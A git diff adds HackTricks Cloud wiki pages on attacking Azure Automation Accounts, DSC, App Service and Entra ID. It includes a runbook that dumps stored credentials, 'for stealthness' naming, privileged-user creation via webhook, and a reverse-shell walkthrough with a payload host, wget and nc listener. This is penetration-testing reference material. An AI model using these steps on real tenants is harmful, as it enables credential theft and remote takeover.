+++ b/pentesting-cloud/azure-security/az-services/az-automation-account/README.md
@@ -0,0 +1,212 @@
+# Az - Automation Account
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/automation/overview) Azure Automation delivers a cloud-based automation, operating system updates, and configuration service that supports consistent management across your Azure and non-Azure environments. It includes process automation, configuration management, update management, shared capabilities, and heterogeneous features.
+
+These are like "**scheduled tasks**" in Azure that will let you execute things (actions or even scripts) to **manage**, check and configure the **Azure environment**.
+
+### Run As Account
+
+When **Run as Account** is used, it creates an Azure AD **application** with self-signed certificate, creates a **service principal** and assigns the **Contributor** role for the account in the **current subscription** (a lot of privileges).\
+Microsoft recommends using a **Managed Identity** for Automation Account.
+
+{% hint style="warning" %}
+This will be **removed on September 30, 2023 and changed for Managed Identities.**
+{% endhint %}
+
+## Runbooks & Jobs
+
+**Runbooks** allow you to **execute arbitrary PowerShell** code. This could be **abused by an attacker** to steal the permissions of the **attached principal** (if any).\
+In the **code** of **Runbooks** you could also find **sensitive info** (such as creds).
+
+If you can **read** the **jobs**, do it as they **contain** the **output** of the run (potential **sensitive info**).
+
+Go to `Automation Accounts` --> `<Select Automation Account>` --> `Runbooks/Jobs/Hybrid worker groups/Watcher tasks/credentials/variables/certificates/connections`
+
+### Hybrid Worker
+
+A Runbook can be run in a **container inside Azure** or in a **Hybrid Worker** (non-azure machine).\
+The **Log Analytics Agent** is deployed on the VM to register it as a hybrid worker.\
+The hybrid worker jobs run as **SYSTEM** on Windows and **nxautomation** account on Linux.\
+Each Hybrid Worker is registered in a **Hybrid Worker Group**.
+
+Therefore, if you can choose to run a **Runbook** in a **Windows Hybrid Worker**, you will execute **arbitrary commands** inside an external machine as **System** (nice pivot technique).
+
+## Compromise State Configuration (SC)
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview) Azure Automation **State Configuration** is an Azure configuration management service that allows you to write, manage, and compile PowerShell Desired State Configuration (DSC) [configurations](https://learn.microsoft.com/en-us/powershell/dsc/configurations/configurations) for nodes in any cloud or on-premises datacenter. The service also imports [DSC Resources](https://learn.microsoft.com/en-us/powershell/dsc/resources/resources), and assigns configurations to target nodes, all in the cloud. You can access Azure Automation State Configuration in the Azure portal by selecting **State configuration (DSC)** under **Configuration Management**.
+
+**Sensitive information** could be found in these configurations.
+
+### RCE
+
+It's possible to abuse SC to run arbitrary scripts in the managed machines.
+
+{% content-ref url="az-state-configuration-rce.md" %}
+[az-state-configuration-rce.md](az-state-configuration-rce.md)
+{% endcontent-ref %}
+
+## Enumeration
+
+{% code overflow="wrap" %}
+```powershell
+# Check user right for automation
+az extension add --upgrade -n automation
+az automation account list # if it doesn't return anything the user is not a part of an Automation group
+
+# Gets Azure Automation accounts in a resource group
+Get-AzAutomationAccount
+
+# List & get DSC configs
+Get-AzAutomationAccount | Get-AzAutomationDscConfiguration
+Get-AzAutomationAccount | Get-AzAutomationDscConfiguration | where {$_.name -match '<name>'} | Export-AzAutomationDscConfiguration -OutputFolder . -Debug
+## Automation Accounts named SecurityBaselineConfigurationWS... are there by default (not interesting)
+
+# List & get Run books code
+Get-AzAutomationAccount | Get-AzAutomationRunbook
+Get-AzAutomationAccount | Get-AzAutomationRunbook | Export-AzAutomationRunbook -OutputFolder /tmp
+
+# List credentials & variables & others
+Get-AzAutomationAccount | Get-AzAutomationCredential
+Get-AzAutomationAccount | Get-AzAutomationVariable
+Get-AzAutomationAccount | Get-AzAutomationConnection
+Get-AzAutomationAccount | Get-AzAutomationCertificate
+Get-AzAutomationAccount | Get-AzAutomationSchedule
+Get-AzAutomationAccount | Get-AzAutomationModule
+Get-AzAutomationAccount | Get-AzAutomationPython3Package
+## Exfiltrate credentials & variables and the other info loading them in a Runbook and printing them
+
+# List hybrid workers
+Get-AzAutomationHybridWorkerGroup -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME>
+```
+{% endcode %}
+
+### Create a Runbook
+
+{% code overflow="wrap" %}
+```powershell
+# Get the role of a user on the Automation account
+# Contributor or higher = Can create and execute Runbooks
+Get-AzRoleAssignment -Scope /subscriptions/<ID>/resourceGroups/<RG-NAME>/providers/Microsoft.Automation/automationAccounts/<AUTOMATION-ACCOUNT>
+
+# Create a Powershell Runbook
+Import-AzAutomationRunbook -Name <RUNBOOK-NAME> -Path C:\Tools\username.ps1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Type PowerShell -Force -Verbose
+
+# Publish the Runbook
+Publish-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
+
+# Start the Runbook
+Start-AzAutomationRunbook -RunbookName <RUNBOOK-NAME> -RunOn Workergroup1 -AutomationAccountName <AUTOMATION-ACCOUNT> -ResourceGroupName <RG-NAME> -Verbose
+```
+{% endcode %}
+
+### Exfiltrate Creds & Variables defined in an Automation Account using a Run Book
+
+{% code overflow="wrap" %}
+```powershell
+# Change the crdentials & variables names and add as many as you need
+@'
+$creds = Get-AutomationPSCredential -Name <credentials_name>
+$runbook_variable = Get-AutomationVariable -name <variable_name>
+$runbook_variable
+$creds.GetNetworkCredential().username
+$creds.GetNetworkCredential().password
+'@ | out-file -encoding ascii 'runbook_get_creds.ps1'
+
+$ResourceGroupName = '<resource_group_name>'
+$AutomationAccountName = '<auto_acc_name>'
+$RunBookName = 'Exif-Credentials' #Change this for stealthness
+
+# Creare Run book, publish, start, and get output
+New-AzAutomationRunBook -name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Type PowerShell
+Import-AzAutomationRunBook -Path 'runbook_get_creds.ps1' -Name $RunBookName -Type PowerShell -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName -Force
+Publish-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
+$start = Start-AzAutomationRunBook -Name $RunBookName -AutomationAccountName $AutomationAccountName -ResourceGroupName $ResourceGroupName
+start-sleep 20
+($start | Get-AzAutomationJob | Get-AzAutomationJobOutput).Summarynt
+```
+{% endcode %}
+
+{% hint style="info" %}
+You could do the same thing modifying an existing Run Book, and from the web console.
+{% endhint %}
+
+### Steps for Setting Up an Automated Highly Privileged User Creation
+
+#### 1. Initialize an Automation Account
+
+* **Action Required:** Create a new Automation Account.
+* **Specific Setting:** Ensure "Create Azure Run As account" is enabled.
+
+#### 2. Import and Set Up Runbook
+
+* **Source:** Download the sample runbook from [MicroBurst GitHub Repository](https://github.com/NetSPI/MicroBurst).
+* **Actions Required:**
+  * Import the runbook into the Automation Account.
+  * Publish the runbook to make it executable.
+  * Attach a webhook to the runbook, enabling external triggers.
+
+#### 3. Configure AzureAD Module
+
+* **Action Required:** Add the AzureAD module to the Automation Account.
+* **Additional Step:** Ensure all Azure Automation Modules are updated to their latest versions.
+
+#### 4. Permission Assignment
+
+* **Roles to Assign:**
+  * User Administrator
+  * Subscription Owner
+* **Target:** Assign these roles to the Automation Account for necessary privileges.
+
+#### 5. Awareness of Potential Access Loss
+
+* **Note:** Be aware that configuring such automation might lead to losing control over the subscription.
+
+#### 6. Trigger User Creation
+
+* Trigger the webhook to create a new user by sending a POST request.
+* Use the PowerShell script provided, ensuring to replace the `$uri` with your actual webhook URL and updating the `$AccountInfo` with the desired username and password.
+
+```powershell
+$uri = "<YOUR_WEBHOOK_URL>"
+$AccountInfo  = @(@{RequestBody=@{Username="<DESIRED_USERNAME>";Password="<DESIRED_PASSWORD>"}})
+$body = ConvertTo-Json -InputObject $AccountInfo
+$response = Invoke-WebRequest -Method Post -Uri $uri -Body $body
+```
+
+## References
+
+* [https://learn.microsoft.com/en-us/azure/automation/overview](https://learn.microsoft.com/en-us/azure/automation/overview)
+* [https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview](https://learn.microsoft.com/en-us/azure/automation/automation-dsc-overview)
+* [https://github.com/rootsecdev/Azure-Red-Team#runbook-automation](https://github.com/rootsecdev/Azure-Red-Team#runbook-automation)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
new file mode 100644
index 0000000000..5f6a843455
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-automation-account/az-state-configuration-rce.md
@@ -0,0 +1,91 @@
+# Az - State Configuration RCE
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+**Check the complete post in:** [**https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe**](https://medium.com/cepheisecurity/abusing-azure-dsc-remote-code-execution-and-privilege-escalation-ab8c35dd04fe)
+
+### Summary of Remote Server (C2) Infrastructure Preparation and Steps
+
+#### Overview
+
+The process involves setting up a remote server infrastructure to host a modified Nishang `Invoke-PowerShellTcp.ps1` payload, named `RevPS.ps1`, designed to bypass Windows Defender. The payload is served from a Kali Linux machine with IP `40.84.7.74` using a simple Python HTTP server. The operation is executed through several steps:
+
+#### Step 1 — Create Files
+
+* **Files Required:** Two PowerShell scripts are needed:
+  1. `reverse_shell_config.ps1`: A Desired State Configuration (DSC) file that fetches and executes the payload. It is obtainable from [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/reverse_shell_config.ps1).
+  2. `push_reverse_shell_config.ps1`: A script to publish the configuration to the VM, available at [GitHub](https://github.com/nickpupp0/AzureDSCAbuse/blob/master/push_reverse_shell_config.ps1).
+* **Customization:** Variables and parameters in these files must be tailored to the user's specific environment, including resource names, file paths, and server/payload identifiers.
+
+#### Step 2 — Zip Configuration File
+
+* The `reverse_shell_config.ps1` is compressed into a `.zip` file, making it ready for transfer to the Azure Storage Account.
+
+```powershell
+Compress-Archive -Path .\reverse_shell_config.ps1 -DestinationPath .\reverse_shell_config.ps1.zip
+```
+
+#### Step 3 — Set Storage Context & Upload
+
+* The zipped configuration file is uploaded to a predefined Azure Storage container, azure-pentest, using Azure's Set-AzStorageBlobContent cmdlet.
+
+```powershell
+Set-AzStorageBlobContent -File "reverse_shell_config.ps1.zip" -Container "azure-pentest" -Blob "reverse_shell_config.ps1.zip" -Context $ctx
+```
+
+#### Step 4 — Prep Kali Box
+
+* The Kali server downloads the RevPS.ps1 payload from a GitHub repository.
+
+```bash
+wget https://raw.githubusercontent.com/nickpupp0/AzureDSCAbuse/master/RevPS.ps1
+```
+
+* The script is edited to specify the target Windows VM and port for the reverse shell.
+
+#### Step 5 — Publish Configuration File
+
+* The configuration file is executed, resulting in the reverse-shell script being deployed to the specified location on the Windows VM.
+
+#### Step 6 — Host Payload and Setup Listener
+
+* A Python SimpleHTTPServer is started to host the payload, along with a Netcat listener to capture incoming connections.
+
+```bash
+sudo python -m SimpleHTTPServer 80
+sudo nc -nlvp 443
+```
+
+* The scheduled task executes the payload, achieving SYSTEM-level privileges.
+
+#### Conclusion
+
+The successful execution of this process opens numerous possibilities for further actions, such as credential dumping or expanding the attack to multiple VMs. The guide encourages continued learning and creativity in the realm of Azure Automation DSC.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-azure-app-service.md b/pentesting-cloud/azure-security/az-services/az-azure-app-service.md
new file mode 100644
index 0000000000..4f5d822c82
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-azure-app-service.md
@@ -0,0 +1,176 @@
+# Az - Azure App Service & Function Apps
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## App Service Basic Information
+
+[From the docs:](https://learn.microsoft.com/en-us/azure/app-service/overview) _Azure App Service_ is an HTTP-based service for hosting web applications, REST APIs, and mobile back ends. You can develop in your favourite language, be it .NET, .NET Core, Java, Ruby, Node.js, PHP, or Python. Applications run and scale with ease on both Windows and Linux-based environments.
+
+Each app runs inside a sandbox but isolation depends upon App Service plans
+
+* Apps in Free and Shared tiers run on shared VMs
+* Apps in Standard and Premium tiers run on dedicated VMs
+
+{% hint style="warning" %}
+Note that **none** of those isolations **prevents** other common **web vulnerabilities** (such as file upload, or injections). And if a **management identity** is used, it could be able to **compromise its permissions**.
+{% endhint %}
+
+### Enumeration
+
+{% tabs %}
+{% tab title="az" %}
+{% code overflow="wrap" %}
+```bash
+# List webapps
+az webapp list
+
+## Less information
+az webapp list --query "[].{hostName: defaultHostName, state: state, name: name, resourcegroup: resourceGroup}"
+
+# Get access restrictions
+az webapp config access-restriction show --resource-group <res-group> -n <name>
+
+# Remove access restrictions
+az webapp config access-restriction remove --resource-group <res-group> -n <name> --rule-name <rule-name>
+
+# Get snapshots
+az webapp config snapshot list --resource-group <res-group> -n <name>
+
+# Restore snapshot
+az webapp config snapshot restore -g <res-group> -n <name> --time 2018-12-11T23:34:16.8388367
+
+# Restart webapp
+az webapp restart --name <name> --resource-group <res-group>
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az Powershell" %}
+```powershell
+# Get App Services and Function Apps
+Get-AzWebApp
+# Get only App Services
+Get-AzWebApp | ?{$_.Kind -notmatch "functionapp"}
+```
+{% endtab %}
+
+{% tab title="az get all" %}
+{% code overflow="wrap" %}
+```bash
+#!/bin/bash
+
+# Get all App Service and Function Apps
+
+# Define Azure subscription ID
+azure_subscription="your_subscription_id"
+
+# Log in to Azure
+az login
+
+# Select Azure subscription
+az account set --subscription $azure_subscription
+
+# Get all App Services in the specified subscription
+list_app_services=$(az appservice list --query "[].{appServiceName: name, group: resourceGroup}" -o tsv)
+
+# Iterate over each App Service
+echo "$list_app_services" | while IFS=$'\t' read -r appServiceName group; do
+  # Get the type of the App Service
+  service_type=$(az appservice show --name $appServiceName --resource-group $group --query "kind" -o tsv)
+
+  # Check if it is a Function App and print its name
+  if [ "$service_type" == "functionapp" ]; then
+    echo "Function App Name: $appServiceName"
+  fi
+done
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+#### Obtain credentials & get access to the webapp code
+
+```bash
+# Get connection strings that could contain credentials (with DBs for example)
+az webapp config connection-string list --name <name> --resource-group <res-group>
+## Check how to use the DBs connection strings in the SQL page
+
+# Get credentials to access the code and DB credentials if configured.
+az webapp deployment list-publishing-profiles --resource-group <res-group> -n <name>
+
+
+# Get git URL to access the code
+az webapp deployment source config-local-git --resource-group <res-group> -n <name>
+
+# Access/Modify the code via git
+git clone 'https://<username>:<password>@name.scm.azurewebsites.net/repo-name.git'
+## In my case the username was: $nameofthewebapp and the password some random chars
+## If you change the code and do a push, the app is automatically redeployed
+```
+
+#### Access to the Docker container with the webapp via ssh:
+
+```bash
+# Get ssh session
+az webapp create-remote-connection --subscription <SUBSCRIPTION-ID> --resource-group <RG-NAME> -n <APP-SERVICE-NAME>
+
+## If successfull you will get a message such as:
+#Verifying if app is running....
+#App is running. Trying to establish tunnel connection...
+#Opening tunnel on port: 39895
+#SSH is available { username: root, password: Docker! }
+
+## So from that machine ssh into that port (you might need generate a new ssh session to the jump host)
+ssh root@127.0.0.1 -p 39895
+```
+
+## Function Apps Basic Information
+
+Azure Functions is a **serverless** solution that allows you to write less code, maintain less infrastructure, and save on costs. Instead of worrying about deploying and maintaining servers, the cloud infrastructure provides all the up-to-date resources needed to keep your applications running.
+
+In the Azure portal, integration between Azure Functions and Azure API Management is facilitated, allowing **HTTP trigger function endpoints to be exposed as REST APIs**. The APIs exposed in this manner are described using an OpenAPI definition, providing a standard, language-agnostic interface to RESTful APIs.
+
+**Function Apps support Managed Identities.**
+
+Moreover Function App might have certain endpoints that require a certain level of authentication, such as "admin" or "anonymous".\
+An attacker could try to access the **anonymous allowed endpoints** to bypass the restrictions and gain access to sensitive data or functionality.
+
+### Enumeration
+
+```powershell
+# Get only Function Apps
+Get-AzFunctionApp
+```
+
+## References
+
+* [https://learn.microsoft.com/en-in/azure/app-service/overview](https://learn.microsoft.com/en-in/azure/app-service/overview)
+* [https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition](https://learn.microsoft.com/en-us/azure/azure-functions/functions-openapi-definition)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/azure-security/az-services/az-azuread.md b/pentesting-cloud/azure-security/az-services/az-azuread.md
new file mode 100644
index 0000000000..cfd5cdd7ab
--- /dev/null
+++ b/pentesting-cloud/azure-security/az-services/az-azuread.md
@@ -0,0 +1,1017 @@
+# Az - Entra ID (AzureAD) & Azure IAM
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+Azure Active Directory (Azure AD) serves as Microsoft's cloud-based service for identity and access management. It is instrumental in enabling employees to sign in and gain access to resources, both within and beyond the organization, encompassing Microsoft 365, the Azure portal, and a multitude of other SaaS applications. The design of Azure AD focuses on delivering essential identity services, prominently including **authentication, authorization, and user management**.
+
+Key features of Azure AD involve **multi-factor authentication** and **conditional access**, alongside seamless integration with other Microsoft security services. These features significantly elevate the security of user identities and empower organizations to effectively implement and enforce their access policies. As a fundamental component of Microsoft's cloud services ecosystem, Azure AD is pivotal for the cloud-based management of user identities.
+
+## Enumeration
+
+### **Connection**
+
+{% tabs %}
+{% tab title="az cli" %}
+```bash
+az login #This will open the browser (if not use --use-device-code)
+az login -u <username> -p <password> #Specify user and password
+az login --identity #Use the current machine managed identity (metadata)
+az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
+
+# Login as service principal
+## With password
+az login --service-principal -u <application ID> -p VerySecret --tenant contoso.onmicrosoft.com # Tenant can also be the tenant UUID
+## With cert
+az login --service-principal -u <application ID> -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com
+
+# Request access token (ARM)
+az account get-access-token
+# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
+az account get-access-token --resource-type aad-graph
+
+# If you want to configure some defaults
+az configure
+
+# Get user logged-in already
+az ad signed-in-user show
+
+# Help
+az find "vm" # Find vm commands
+az vm -h # Get subdomains
+az ad user list --query-examples # Get examples
+```
+{% endtab %}
+
+{% tab title="Mg" %}
+```powershell
+# Login Open browser
+Connect-MgGraph
+
+# Login with service principal secret
+## App ID and Tenant ID of your Azure AD App Registration
+$appId = "<appId>"
+$tenantId = "<tenantId>"
+$clientSecret = "<clientSecret>"
+## Convert the client secret to a SecureString
+$secureSecret = ConvertTo-SecureString -String $clientSecret -AsPlainText -Force
+## Create a PSCredential object
+$credential = New-Object System.Management.Automation.PSCredential ($appId, $secureSecret)
+## Connect using client credentials
+Connect-MgGraph -TenantId $tenantId -ClientSecretCredential $credential
+
+# Login with token
+$token = (az account get-access-token --resource https://graph.microsoft.com --query accessToken -o tsv)
+$secureToken = ConvertTo-SecureString $token -AsPlainText -Force
+Connect-MgGraph -AccessToken $secureToken
+
+# Find commands
+Find-MgGraphCommand -command *Mg*
+```
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+```powershell
+Connect-AzAccount #Open browser
+# Using credentials
+$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential("test@corp.onmicrosoft.com", $passwd)
+Connect-AzAccount -Credential $creds
+
+# Get Access Token
+(Get-AzAccessToken).Token
+# Request access token to other endpoints: AadGraph, AnalysisServices, Arm, Attestation, Batch, DataLake, KeyVault, MSGraph, OperationalInsights, ResourceManager, Storage, Synapse
+(Get-AzAccessToken -ResourceTypeName MSGraph).Token
+(Get-AzAccessToken -Resource "https://graph.microsoft.com").Token
+
+# Connect with access token
+Connect-AzAccount -AccountId test@corp.onmicrosoft.com -AccessToken $token
+Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
+## The -AccessToken is from management.azure.com
+
+# Connect with Service principal/enterprise app secret
+$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
+$creds = New-Object
+ System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
+Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 29sd87e56-a192-a934-bca3-0398471ab4e7d
+
+#All the Azure AD cmdlets have the format *-AzAD*
+Get-Command *azad*
+#Cmdlets for other Azure resources have the format *Az*
+Get-Command *az*
+```
+{% endtab %}
+
+{% tab title="Raw PS" %}
+{% code overflow="wrap" %}
+```powershell
+#Using management
+$Token = 'eyJ0eXAi..'
+# List subscriptions
+$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
+$RequestParams = @{
+  Method  = 'GET'
+  Uri     = $URI
+  Headers = @{
+      'Authorization' = "Bearer $Token"
+  }
+}
+(Invoke-RestMethod @RequestParams).value
+
+# Using graph
+Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="curl" %}
+{% code overflow="wrap" %}
+```bash
+# Request tokens to access endpoints
+# ARM
+curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+
+# Vault
+curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Azure AD" %}
+{% code overflow="wrap" %}
+```powershell
+Connect-AzureAD #Open browser
+# Using credentials
+$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd)
+Connect-AzureAD -Credential $creds
+
+# Using tokens
+## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
+Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
